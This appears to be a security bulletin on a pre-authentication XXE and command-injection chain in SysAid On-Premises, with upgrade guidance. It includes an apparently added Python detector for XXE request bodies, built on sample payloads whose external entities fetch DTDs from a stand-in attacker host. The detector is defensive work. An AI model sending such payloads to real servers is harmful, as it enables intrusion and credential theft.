CVE-2025-2775: PoC Released for SysAid On-Premises Pre-Auth RCE Vulnerability


On May 7, 2025, watchTowr publicly disclosed technical details and a proof-of-concept (PoC) exploit for a pre-authenticated Remote Code Execution (RCE) chain affecting SysAid On-Premises, a self-hosted IT service management (ITSM) platform used by organizations to manage IT support tasks. 

Although the vulnerabilities were patched in March 2025, they had not been assigned Common Vulnerabilities and Exposures (CVE) identifiers and were disclosed for the first time with watchTowr’s publication. Common Vulnerability Scoring System (CVSS) scores have not been assigned. 

Given the low barrier to exploitation and the public availability of a PoC exploit, this vulnerability presents an attractive target for threat actors. In 2023, threat actors exploited a zero-day vulnerability in SysAid On-Premises to deploy Cl0p ransomware. 

Vulnerabilities

Three of the vulnerabilities—CVE-2025-2775, CVE-2025-2776, and CVE-2025-2777—are pre-authenticated XML External Entity (XXE) injection issues discovered by watchTowr. While they stem from the same underlying flaw in the application’s XML parsing logic, they are tracked separately. A remote, unauthenticated threat actor can exploit these vulnerabilities by sending specially crafted HTTP POST requests that cause the application to fetch and process external data from threat actor-controlled servers. The vulnerabilities can also be leveraged to extract a file created during installation that contains the main administrator’s clear-text password. 
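As an added defender-side illustration (not code from the Arctic Wolf bulletin, watchTowr or SysAid), the check below classifies inbound XML request bodies by whether they carry the DOCTYPE and external-entity declarations that an XXE request of the kind described above depends on, so a WAF or log-review job can alert on them at a pre-authenticated endpoint. The sample bodies and the host attacker.example are constructed placeholders.

```python
import re
from typing import Optional, Tuple

# Constructed sample request bodies (not real SysAid traffic); the host
# attacker.example is a placeholder, not a real indicator.
SAMPLES = {
    "plain": "<request><user>alice</user></request>",
    "internal_entity": '<!DOCTYPE r [<!ENTITY greet "hi">]><r>&greet;</r>',
    "external_entity": '<!DOCTYPE r [<!ENTITY ext SYSTEM "http://attacker.example/x">]><r>&ext;</r>',
    "parameter_entity": '<!DOCTYPE r [<!ENTITY % p SYSTEM "http://attacker.example/e.dtd"> %p;]><r/>',
    "external_dtd": '<!DOCTYPE r SYSTEM "http://attacker.example/r.dtd"><r/>',
}

_DOCTYPE = re.compile(r"<!DOCTYPE\b", re.IGNORECASE)
_EXT_DTD = re.compile(r"<!DOCTYPE\s+\S+\s+(SYSTEM|PUBLIC)\b", re.IGNORECASE)
_PARAM_ENTITY = re.compile(r"<!ENTITY\s+%", re.IGNORECASE)
_EXT_ENTITY = re.compile(r"<!ENTITY\s+(?:%\s*)?\S+\s+(SYSTEM|PUBLIC)\b", re.IGNORECASE)
_ANY_ENTITY = re.compile(r"<!ENTITY\b", re.IGNORECASE)


def extract_dtd(body: str) -> Optional[str]:
    """Return the DOCTYPE declaration (with any internal subset), or None."""
    m = _DOCTYPE.search(body)
    if not m:
        return None
    start = m.start()
    close = body.find(">", start)
    subset = body.find("[", start)
    if subset != -1 and (close == -1 or subset < close):
        close = body.find("]>", subset)  # an internal subset ends at "]>"
    return body[start:] if close == -1 else body[start:close + 1]


def classify_xml_body(body: str) -> Tuple[str, str]:
    """Classify a body as allow / alert / block with a reason; SYSTEM/PUBLIC
    references are what let XXE make the server reach out to other hosts."""
    dtd = extract_dtd(body)
    if dtd is None:
        return "allow", "no DOCTYPE declaration"
    if _PARAM_ENTITY.search(dtd):
        return "block", "parameter entity in DTD (can pull in a remote DTD)"
    if _EXT_ENTITY.search(dtd):
        return "block", "external general entity (SYSTEM/PUBLIC identifier)"
    if _EXT_DTD.search(dtd):
        return "block", "DOCTYPE references an external DTD"
    if _ANY_ENTITY.search(dtd):
        return "alert", "internal entities only (check for expansion abuse)"
    return "alert", "DOCTYPE present without entity declarations"
```

Any DOCTYPE at all is treated as at least alert-worthy because an ITSM pre-auth endpoint has no legitimate reason to accept one; blocking is reserved for the external references that make the server fetch remote data.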

The fourth vulnerability, CVE-2025-2778, is a post-authentication command injection flaw discovered by an unknown party. It can be chained with the XXE vulnerabilities to achieve full remote code execution. 

Recommendations for CVE-2025-2775

Upgrade to Latest Fixed Version

Arctic Wolf strongly recommends that customers upgrade to the latest fixed version. 

Product | Affected Version | Fixed Version
SysAid On-Premise | 23.3.40 and prior | 24.4.60 and later

Please follow your organization’s patching and testing guidelines to minimize potential operational impact. 
